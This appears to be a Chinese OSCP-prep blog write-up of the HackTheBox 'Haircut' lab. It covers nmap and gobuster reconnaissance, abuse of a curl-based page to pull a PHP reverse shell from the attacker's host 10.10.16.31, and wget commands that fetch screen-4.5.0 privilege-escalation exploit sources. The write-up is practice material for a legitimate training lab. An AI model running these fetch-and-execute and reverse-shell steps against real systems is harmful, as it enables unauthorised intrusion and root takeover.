OSCP备考_0x19_HackThBox靶机_Linux_haircut

Ethan医生4个月前靶场129

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)                


image.png




nmap -sU --top-ports 100 10.129.82.246 (扫描UDP)            


image.png



没有看到特殊的情况直接dir路径爆破 

gobuster dir -u http://10.129.82.246/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

            

           image.png                              




http://10.129.82.246/test.html

   image.png

都没有用 发现了有意思的地方

SSRF,http://10.129.82.246//exposed.php

         image.png

直接请求文件反弹SHELL

是使用CURL请求

http://10.10.16.31:8000/p_ec.php -o /var/www/html/uploads/p_ec.php              试试看能不能写入文件

                                    

访问后直接反弹了

image.png

/usr/bin/screen-4.5.0

image.png

wget 10.10.16.31:8000/libhx.c

wget 10.10.16.31:8000/rootshell.c


这里有3部分,我刚开始直接丢到目标靶机上执行操作,发现执行失败了,所以在本地执行此脚本,然后将生成的文件传到目标靶机,再次执行此exploit的最后一部分,如果不行,执行手动执行/tmp目录下的rootshell文件即可提权成功

标签: OSCP

相关文章

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。